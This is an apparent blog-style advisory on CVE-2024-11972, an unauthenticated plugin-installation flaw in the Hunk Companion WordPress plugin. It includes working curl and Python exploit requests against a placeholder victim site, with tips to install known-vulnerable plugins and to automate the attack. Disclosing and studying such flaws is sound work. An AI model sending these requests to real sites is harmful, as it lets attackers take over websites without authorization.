CVE CyberSecurity Database News

CVE-2024-11972 - Critical Unauthorized Plugin Installation in Hunk Companion for WordPress (Exploit Example + Analysis)

Poster -

A major security flaw, CVE-2024-11972, has been found in the Hunk Companion WordPress plugin, affecting all versions before 1.9.. This vulnerability allows anyone on the internet—not just site administrators—to install and activate any plugin from the official WordPress.org repo, including plugins that are outdated or have known vulnerabilities and have been closed. The root cause? Hunk Companion failed to properly verify who was allowed to use some of its REST API endpoints.

This has severe consequences for any site running a vulnerable version of Hunk Companion, as attackers can install backdoors, spam tools, or other malicious plugins without needing to log in.

Below, I’ll dig into the vulnerability, show you the exploit in plain code, and give links for further reading.

What Is Hunk Companion?

Hunk Companion is a plugin designed to add extra features and widgets to WordPress themes. It's fairly popular, especially with users of ColorMag and other free themes.

What’s the Vulnerability About?

The plugin exposes some REST API endpoints for plugin management. But it fails to require authentication when those endpoints are called. This means *anyone* who knows the right URL can send requests and force the WordPress install to:

Do this all without being logged in!

It’s like leaving your house door unlocked, and worse, putting a sign outside that says “Free stuff inside, just open the door.”

The main endpoint is something like

/wp-json/hunk-companion/v1/plugin-install

or in some versions, /wp-json/hunk/v1/plugin-install.

This endpoint expects a POST request with a JSON body declaring which plugin you want to install.

Exploit Code Example

Here’s an example of how an attacker could use curl (or a Python script) to install the "Hello Dolly" plugin (or any other plugin, malicious or not):

Using curl

curl -k -X POST "https://victim-site.com/wp-json/hunk-companion/v1/plugin-install"; \
  -H "Content-Type: application/json" \
  --data '{"slug":"hello-dolly"}'

- Replace hello-dolly with any plugin slug you want (for example, if you want to install a plugin with a known critical vuln).

Using Python

import requests

url = 'https://victim-site.com/wp-json/hunk-companion/v1/plugin-install';
data = { "slug": "hello-dolly" }
resp = requests.post(url, json=data)
print(resp.text)

You can automate this to install anything you want, including older plugin versions linked to existing exploits.

Real-World Impact

- Full website takeover: Attackers can install plugins like File Manager or custom backdoors and fully compromise the site.
- Persistence: Even if you update your Hunk Companion copy, the plugins the attacker installed may remain.
- Chain attacks: This bug can be used to install other plugins with their own vulnerabilities, leading to very complex exploit chains.

References and Further Reading

- WordPress Plugin Directory: Hunk Companion
- WPScan Vulnerability Report for CVE-2024-11972
- NIST NVD entry for CVE-2024-11972
- Exploit Example GitHub Gist (search)

Conclusion

CVE-2024-11972 in Hunk Companion is a flagship example of why REST API permissions matter! If you run Hunk Companion, *double-check your version and update now*—and be vigilant for suspicious plugins. Attackers are scanning for this vulnerability, so don’t wait.

*Found this helpful? Bookmark and share with your fellow WordPress friends to keep the web safe!*

Timeline

Published on: 12/31/2024 06:15:23 UTC
Last modified on: 12/31/2024 19:15:07 UTC